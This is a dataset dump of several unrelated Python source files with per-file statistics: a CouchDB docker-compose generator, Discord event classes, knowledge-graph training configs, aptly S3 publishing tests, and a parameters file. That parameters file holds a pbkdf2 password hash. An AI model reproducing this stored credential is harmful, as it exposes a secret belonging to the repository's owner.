from . import general | 21.5 | 21 | 0.790698 | 6 | 43 | 5.666667 | 0.666667 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 2 | 22 | 21.5 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da33d10e851c47ce0925f4d6a5bf3a1cdf2ab9dc | 93 | py | Python | parameters_8003.py | helloiloveit/learnWord | 21d6bac03f8b7415d4f71720a07536f8050af51a | [
"BSD-3-Clause"
] | null | null | null | parameters_8003.py | helloiloveit/learnWord | 21d6bac03f8b7415d4f71720a07536f8050af51a | [
"BSD-3-Clause"
] | null | null | null | parameters_8003.py | helloiloveit/learnWord | 21d6bac03f8b7415d4f71720a07536f8050af51a | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$96c9299fd8ff1ff7$0dbe18e7e1c5246a64a20eab7beda23fb1309b45"
| 46.5 | 92 | 0.88172 | 7 | 93 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.450549 | 0.021505 | 93 | 1 | 93 | 93 | 0.450549 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
e59f2dd6d79215a253818c279cc66775a82917f3 | 5,140 | py | Python | utils/produce_db.py | JordiSubira/DGBP | f1b670e3d831f993ed0383d7ec79d2ba03d1a4e1 | [
"Apache-2.0"
] | null | null | null | utils/produce_db.py | JordiSubira/DGBP | f1b670e3d831f993ed0383d7ec79d2ba03d1a4e1 | [
"Apache-2.0"
] | null | null | null | utils/produce_db.py | JordiSubira/DGBP | f1b670e3d831f993ed0383d7ec79d2ba03d1a4e1 | [
"Apache-2.0"
] | 1 | 2019-04-18T03:08:48.000Z | 2019-04-18T03:08:48.000Z | import yaml
'''
couchdb0:
container_name: couchdb0
image: hyperledger/fabric-couchdb
# Populate the COUCHDB_USER and COUCHDB_PASSWORD to set an admin user and password
# for CouchDB. This will prevent CouchDB from operating in an "Admin Party" mode.
environment:
- COUCHDB_USER=
- COUCHDB_PASSWORD=
# Comment/Uncomment the port mapping if you want to hide/expose the CouchDB service,
# for example map it to utilize Fauxton User Interface in dev environments.
ports:
- "5984:5984"
networks:
- byfn
peer0.org1.example.com:
environment:
- CORE_LEDGER_STATE_STATEDATABASE=CouchDB
- CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb0:5984
# The CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME and CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD
# provide the credentials for ledger to connect to CouchDB. The username and password must
# match the username and password set for the associated CouchDB.
- CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=
- CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD=
depends_on:
- couchdb0
couchdb1:
container_name: couchdb1
image: hyperledger/fabric-couchdb
# Populate the COUCHDB_USER and COUCHDB_PASSWORD to set an admin user and password
# for CouchDB. This will prevent CouchDB from operating in an "Admin Party" mode.
environment:
- COUCHDB_USER=
- COUCHDB_PASSWORD=
# Comment/Uncomment the port mapping if you want to hide/expose the CouchDB service,
# for example map it to utilize Fauxton User Interface in dev environments.
ports:
- "6984:5984"
networks:
- byfn
peer1.org1.example.com:
environment:
- CORE_LEDGER_STATE_STATEDATABASE=CouchDB
- CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb1:5984
# The CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME and CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD
# provide the credentials for ledger to connect to CouchDB. The username and password must
# match the username and password set for the associated CouchDB.
- CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=
- CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD=
depends_on:
- couchdb1
'''
'''couchdb0 ={
'couchdb0' : {
'container_name': 'hyperledger/fabric-couchdb',
'image' : 'hyperledger/fabric-couchdb',
'enviroment' : ['COUCHDB_USER=',
'COUCHDB_PASSWORD='],
'networks' : byfn,
'ports' : ['5984:5984']
}
}
couchdb1 ={
'couchdb1' : {
'container_name': 'hyperledger/fabric-couchdb',
'image' : 'hyperledger/fabric-couchdb',
'enviroment' : ['COUCHDB_USER=',
'COUCHDB_PASSWORD='],
'networks' : byfn,
'ports' : ['6984:5984']
}
}
datapeer0 ={
'peer0.org1.example.com' : {
'enviroment' : ['CORE_LEDGER_STATE_STATEDATABASE=CouchDB',
'CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb0:5984',
'CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=',
'CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD='],
'depends_on' : [couchdb0]
}
datapeer1={
'peer1.org1.example.com' : {
'enviroment' : ['CORE_LEDGER_STATE_STATEDATABASE=CouchDB',
'CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb1:5984',
'CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=',
'CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD='],
'depends_on' : [couchdb1]
}
'''
port_base = 5984
for i in range(0,10):
peer0 = 'peer0.org' + str(i+1) + '.example.com'
peer1 = 'peer1.org' + str(i+1) + '.example.com'
port0 = port_base + (i)*2000
port1 = port_base + (i)*2000 + 1000
couchdb0 = 'couchdb' + str(i*2)
couchdb1 = 'couchdb' + str(i*2+1)
datapeer0 ={
peer0 : {
'environment' : ['CORE_LEDGER_STATE_STATEDATABASE=CouchDB',
'CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb'+ str(i*2) +':5984',
'CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=',
'CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD='],
'depends_on' : [couchdb0]
}
}
datapeer1 ={
peer1 : {
'environment' : ['CORE_LEDGER_STATE_STATEDATABASE=CouchDB',
'CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb'+ str(i*2+1) +':5984',
'CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=',
'CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD='],
'depends_on' : [couchdb1]
}
}
couchdb0 ={
couchdb0: {
'container_name': couchdb0,
'image' : 'hyperledger/fabric-couchdb',
'environment' : ['COUCHDB_USER=',
'COUCHDB_PASSWORD='],
'networks' : ['byfn'],
'ports' : [str(port0)+ ':5984']
}
}
couchdb1 ={
couchdb1 : {
'container_name': couchdb1,
'image' : 'hyperledger/fabric-couchdb',
'environment' : ['COUCHDB_USER=',
'COUCHDB_PASSWORD='],
'networks' : ['byfn'],
'ports' : [str(port1) + ':5984']
}
}
with open('db.yml', 'a') as outfile:
yaml.dump(couchdb0, outfile, default_flow_style=False)
yaml.dump(datapeer0, outfile, default_flow_style=False)
yaml.dump(couchdb1, outfile, default_flow_style=False)
yaml.dump(datapeer1, outfile, default_flow_style=False) | 34.039735 | 97 | 0.680934 | 569 | 5,140 | 5.896309 | 0.173989 | 0.083458 | 0.125186 | 0.183607 | 0.912668 | 0.890611 | 0.879881 | 0.84769 | 0.819374 | 0.819374 | 0 | 0.035265 | 0.211089 | 5,140 | 151 | 98 | 34.039735 | 0.792109 | 0 | 0 | 0.269231 | 0 | 0 | 0.391155 | 0.230902 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.019231 | 0 | 0.019231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
daa0d8522fe4f972ad8a65a36bd782dbfc010aaa | 3,860 | py | Python | hata/discord/scheduled_event/event_types.py | albertopoljak/hata | 96d0b3182eb4f5291eaf36bd23d521787c6b01f1 | [
"0BSD"
] | null | null | null | hata/discord/scheduled_event/event_types.py | albertopoljak/hata | 96d0b3182eb4f5291eaf36bd23d521787c6b01f1 | [
"0BSD"
] | null | null | null | hata/discord/scheduled_event/event_types.py | albertopoljak/hata | 96d0b3182eb4f5291eaf36bd23d521787c6b01f1 | [
"0BSD"
] | 1 | 2020-09-17T20:10:15.000Z | 2020-09-17T20:10:15.000Z | __all__ = ('ScheduledEventSubscribeEvent', 'ScheduledEventUnsubscribeEvent')
from ..bases import EventBase
class ScheduledEventSubscribeEvent(EventBase):
"""
Represents a `GUILD_SCHEDULED_EVENT_USER_ADD` event.
Attributes
----------
guild_id : `int`
The guild's identifier, where the event will be.
scheduled_event_id : `int`
The scheduled event's identifier.
user_id : `int`
The identifier of the user, who subscribed to the event.
"""
__slots__ = ('guild_id', 'scheduled_event_id', 'user_id', )
def __new__(cls, data):
"""
Creates a new scheduled event subscribe from the given data.
Parameters
----------
data : `dict` of (`str`, `Any`) items
Scheduled event subscribe event data.
"""
guild_id = int(data['guild_id'])
scheduled_event_id = int(data['guild_scheduled_event_id'])
user_id = int(data['user_id'])
self = object.__new__(cls)
self.guild_id = guild_id
self.scheduled_event_id = scheduled_event_id
self.user_id = user_id
return self
def __repr__(self):
"""Returns the representation of the scheduled event subscribe event."""
repr_parts = [
'<',
self.__class__.__name__,
' guild_id=',
repr(self.guild_id),
', scheduled_event_id=',
repr(self.scheduled_event_id),
', user_id=',
repr(self.scheduled_event_id),
'>'
]
return ''.join(repr_parts)
def __len__(self):
"""Helper for unpacking if needed."""
return 3
def __iter__(self):
"""
Unpacks the scheduled event subscribe event.
This method is a generator.
"""
yield self.guild_id
yield self.scheduled_event_id
yield self.user_id
class ScheduledEventUnsubscribeEvent(EventBase):
"""
Represents a `GUILD_SCHEDULED_EVENT_USER_REMOVE` event.
Attributes
----------
guild_id : `int`
The guild's identifier, where the event will be.
scheduled_event_id : `int`
The scheduled event's identifier.
user_id : `int`
The identifier of the user, who unsubscribed to the event.
"""
__slots__ = ('guild_id', 'scheduled_event_id', 'user_id', )
def __new__(cls, data):
"""
Creates a new scheduled event unsubscribe from the given data.
Parameters
----------
data : `dict` of (`str`, `Any`) items
Scheduled event unsubscribe event data.
"""
guild_id = int(data['guild_id'])
scheduled_event_id = int(data['guild_scheduled_event_id'])
user_id = int(data['user_id'])
self = object.__new__(cls)
self.guild_id = guild_id
self.scheduled_event_id = scheduled_event_id
self.user_id = user_id
return self
def __repr__(self):
"""Returns the representation of the scheduled event unsubscribe event."""
repr_parts = [
'<',
self.__class__.__name__,
' guild_id=',
repr(self.guild_id),
', scheduled_event_id=',
repr(self.scheduled_event_id),
', user_id=',
repr(self.scheduled_event_id),
'>'
]
return ''.join(repr_parts)
def __len__(self):
"""Helper for unpacking if needed."""
return 3
def __iter__(self):
"""
Unpacks the scheduled event unsubscribe event.
This method is a generator.
"""
yield self.guild_id
yield self.scheduled_event_id
yield self.user_id
| 27.769784 | 82 | 0.560622 | 413 | 3,860 | 4.861985 | 0.162228 | 0.223108 | 0.159363 | 0.071713 | 0.888446 | 0.868526 | 0.868526 | 0.825697 | 0.825697 | 0.825697 | 0 | 0.000782 | 0.337824 | 3,860 | 138 | 83 | 27.971014 | 0.78482 | 0.326943 | 0 | 0.903226 | 0 | 0 | 0.126816 | 0.046675 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.016129 | 0 | 0.306452 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
977ca0fb6dba3f2e340650764101792fff2f96b8 | 15,861 | py | Python | code/config.py | liuqiangh/NeuCFlow | 438484ffcf51964fcb68f671b83fd58060fde1f1 | [
"Apache-2.0"
] | null | null | null | code/config.py | liuqiangh/NeuCFlow | 438484ffcf51964fcb68f671b83fd58060fde1f1 | [
"Apache-2.0"
] | null | null | null | code/config.py | liuqiangh/NeuCFlow | 438484ffcf51964fcb68f671b83fd58060fde1f1 | [
"Apache-2.0"
] | null | null | null | import argparse
# FB237
def get_fb237_config(parser):
parser.add_argument('--dataset', default='FB237')
parser.add_argument('--n_dims_sm', type=int, default=50)
parser.add_argument('--n_dims', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=80)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=200)
parser.add_argument('--max_attended_nodes', type=int, default=20)
parser.add_argument('--max_seen_nodes', type=int, default=200)
parser.add_argument('--test_batch_size', type=int, default=80)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=200)
parser.add_argument('--test_max_attended_nodes', type=int, default=20)
parser.add_argument('--test_max_seen_nodes', type=int, default=200)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=2)
parser.add_argument('--con_steps', type=int, default=6)
parser.add_argument('--max_epochs', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=True)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.99)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
# FB15K
def get_fb15k_config(parser):
parser.add_argument('--dataset', default='FB15K')
parser.add_argument('--n_dims_sm', type=int, default=50)
parser.add_argument('--n_dims', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=80)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=200)
parser.add_argument('--max_attended_nodes', type=int, default=20)
parser.add_argument('--max_seen_nodes', type=int, default=200)
parser.add_argument('--test_batch_size', type=int, default=80)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=200)
parser.add_argument('--test_max_attended_nodes', type=int, default=20)
parser.add_argument('--test_max_seen_nodes', type=int, default=200)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=1)
parser.add_argument('--con_steps', type=int, default=6)
parser.add_argument('--max_epochs', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.99)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
# OP
def get_op_config(parser):
parser.add_argument('--dataset', default='OP')
parser.add_argument('--n_dims_sm', type=int, default=50)
parser.add_argument('--n_dims', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=80)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=200)
parser.add_argument('--max_attended_nodes', type=int, default=20)
parser.add_argument('--max_seen_nodes', type=int, default=200)
parser.add_argument('--test_batch_size', type=int, default=80)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=200)
parser.add_argument('--test_max_attended_nodes', type=int, default=20)
parser.add_argument('--test_max_seen_nodes', type=int, default=200)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=1)
parser.add_argument('--con_steps', type=int, default=6)
parser.add_argument('--max_epochs', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.99)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
# WN18RR
def get_wn18rr_config(parser):
parser.add_argument('--dataset', default='WN18RR')
parser.add_argument('--n_dims_sm', type=int, default=50)
parser.add_argument('--n_dims', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=200)
parser.add_argument('--max_attended_nodes', type=int, default=20)
parser.add_argument('--max_seen_nodes', type=int, default=200)
parser.add_argument('--test_batch_size', type=int, default=100)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=200)
parser.add_argument('--test_max_attended_nodes', type=int, default=20)
parser.add_argument('--test_max_seen_nodes', type=int, default=200)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=2)
parser.add_argument('--con_steps', type=int, default=8)
parser.add_argument('--max_epochs', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.99)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
# WN
def get_wn_config(parser):
parser.add_argument('--dataset', default='WN')
parser.add_argument('--n_dims_sm', type=int, default=50)
parser.add_argument('--n_dims', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=200)
parser.add_argument('--max_attended_nodes', type=int, default=20)
parser.add_argument('--max_seen_nodes', type=int, default=200)
parser.add_argument('--test_batch_size', type=int, default=100)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=200)
parser.add_argument('--test_max_attended_nodes', type=int, default=20)
parser.add_argument('--test_max_seen_nodes', type=int, default=200)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=1)
parser.add_argument('--con_steps', type=int, default=8)
parser.add_argument('--max_epochs', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.99)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
# YAGO310
def get_yago310_config(parser):
parser.add_argument('--dataset', default='YAGO310')
parser.add_argument('--n_dims_sm', type=int, default=50)
parser.add_argument('--n_dims', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=200)
parser.add_argument('--max_attended_nodes', type=int, default=20)
parser.add_argument('--max_seen_nodes', type=int, default=200)
parser.add_argument('--test_batch_size', type=int, default=100)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=200)
parser.add_argument('--test_max_attended_nodes', type=int, default=20)
parser.add_argument('--test_max_seen_nodes', type=int, default=200)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=1)
parser.add_argument('--con_steps', type=int, default=6)
parser.add_argument('--max_epochs', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.0001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.99)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
# Nell995: for separate learning per subset
def get_nell995_separate_config(parser):
parser.add_argument('--dataset', default='NELL995')
parser.add_argument('--n_dims_sm', type=int, default=200)
parser.add_argument('--n_dims', type=int, default=200)
parser.add_argument('--batch_size', type=int, default=10)
parser.add_argument('--max_edges_per_example', type=int, default=10000)
parser.add_argument('--max_edges_per_node', type=int, default=1000)
parser.add_argument('--max_attended_nodes', type=int, default=100)
parser.add_argument('--max_seen_nodes', type=int, default=1000)
parser.add_argument('--test_batch_size', type=int, default=10)
parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
parser.add_argument('--test_max_edges_per_node', type=int, default=1000)
parser.add_argument('--test_max_attended_nodes', type=int, default=100)
parser.add_argument('--test_max_seen_nodes', type=int, default=1000)
parser.add_argument('--n_layers', type=int, default=2)
parser.add_argument('--aggregate_op', default='mean_v3')
parser.add_argument('--uncon_steps', type=int, default=1)
parser.add_argument('--con_steps', type=int, default=5)
parser.add_argument('--max_epochs', type=int, default=3)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--clipnorm', type=float, default=1.)
parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
parser.add_argument('--timer', action='store_true', default=False)
parser.add_argument('--print_train', action='store_true', default=True)
parser.add_argument('--print_train_metric', action='store_true', default=True)
parser.add_argument('--print_train_freq', type=int, default=1)
parser.add_argument('--eval_within_epoch', default=[])
parser.add_argument('--eval_valid', action='store_true', default=False)
parser.add_argument('--moving_mean_decay', type=float, default=0.9)
parser.add_argument('--test_output_attention', action='store_true', default=False)
parser.add_argument('--test_analyze_attention', action='store_true', default=False)
return parser
def get_default_config(name):
parser = argparse.ArgumentParser()
if name == 'FB237' or name == 'FB237_v2':
return get_fb237_config(parser)
elif name == 'FB15K':
return get_fb15k_config(parser)
elif name == 'OP' or 'OP3':
return get_op_config(parser)
elif name == 'WN18RR' or name == 'WN18RR_v2':
return get_wn18rr_config(parser)
elif name == 'WN':
return get_wn_config(parser)
elif name == 'YAGO310':
return get_yago310_config(parser)
elif name == 'NELL995':
return get_nell995_separate_config(parser)
else:
raise ValueError('Invalid `name`')
| 49.105263 | 91 | 0.729525 | 2,223 | 15,861 | 4.900135 | 0.045434 | 0.173506 | 0.327733 | 0.094464 | 0.950151 | 0.945745 | 0.945745 | 0.917837 | 0.908657 | 0.900211 | 0 | 0.030421 | 0.110901 | 15,861 | 322 | 92 | 49.257764 | 0.742022 | 0.004666 | 0 | 0.802469 | 0 | 0 | 0.263768 | 0.087395 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032922 | false | 0 | 0.004115 | 0 | 0.09465 | 0.08642 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
97be3387eb249babc9432ccfb6b56888b1ed62ae | 10,272 | py | Python | system/t06_publish/s3.py | steven-aerts/aptly | a64807efdaf5e380bfa878c71bc88eae10d62be1 | [
"MIT"
] | 1 | 2018-08-05T07:15:36.000Z | 2018-08-05T07:15:36.000Z | system/t06_publish/s3.py | steven-aerts/aptly | a64807efdaf5e380bfa878c71bc88eae10d62be1 | [
"MIT"
] | null | null | null | system/t06_publish/s3.py | steven-aerts/aptly | a64807efdaf5e380bfa878c71bc88eae10d62be1 | [
"MIT"
] | 1 | 2019-04-26T15:27:53.000Z | 2019-04-26T15:27:53.000Z | from s3_lib import S3Test
def strip_processor(output):
return "\n".join([l for l in output.split("\n") if not l.startswith(' ') and not l.startswith('Date:')])
class S3Publish1Test(S3Test):
"""
publish to S3: from repo
"""
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${files}",
]
runCmd = "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:"
def check(self):
super(S3Publish1Test, self).check()
self.check_exists('public/dists/maverick/InRelease')
self.check_exists('public/dists/maverick/Release')
self.check_exists('public/dists/maverick/Release.gpg')
self.check_exists('public/dists/maverick/main/binary-i386/Packages')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('public/dists/maverick/main/source/Sources')
self.check_exists('public/dists/maverick/main/source/Sources.gz')
self.check_exists('public/dists/maverick/main/source/Sources.bz2')
self.check_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
# # verify contents except of sums
self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('public/dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class S3Publish2Test(S3Test):
"""
publish to S3: publish update removed some packages
"""
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${files}/",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:",
"aptly repo remove local-repo pyspi"
]
runCmd = "aptly publish update -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick s3:test1:"
def check(self):
super(S3Publish2Test, self).check()
self.check_exists('public/dists/maverick/InRelease')
self.check_exists('public/dists/maverick/Release')
self.check_exists('public/dists/maverick/Release.gpg')
self.check_exists('public/dists/maverick/main/binary-i386/Packages')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('public/dists/maverick/main/source/Sources')
self.check_exists('public/dists/maverick/main/source/Sources.gz')
self.check_exists('public/dists/maverick/main/source/Sources.bz2')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_not_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
# verify contents except of sums
self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('public/dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
